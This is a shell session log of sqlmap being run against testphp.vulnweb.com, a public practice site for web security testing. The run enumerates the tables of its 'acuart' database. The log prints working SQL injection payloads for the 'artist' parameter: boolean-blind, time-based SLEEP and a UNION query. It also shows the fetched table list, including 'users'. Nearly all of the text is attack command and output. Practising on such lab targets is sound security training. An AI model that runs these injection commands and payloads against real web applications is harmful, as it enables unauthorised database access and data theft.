"""sqlmap -u testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables"""



Bilals-MacBook-Air:~ bilalkhanniazi$ sqlmap -u testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:43:27 /2022-06-06/

[00:43:27] [INFO] resuming back-end DBMS 'mysql' 
[00:43:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 9555=9555

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: artist=1 OR SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-5608 UNION ALL SELECT CONCAT(0x7170716a71,0x5951585376754b5159786d785a5772686679746a54726e635651566a4a6e586e695743434775644c,0x716a787071),NULL,NULL-- -
---
[00:43:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
[00:43:28] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

[00:43:29] [INFO] fetched data logged to text files under '/Users/bilalkhanniazi/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 00:43:29 /2022-06-06/

Bilals-MacBook-Air:~ bilalkhanniazi$ 
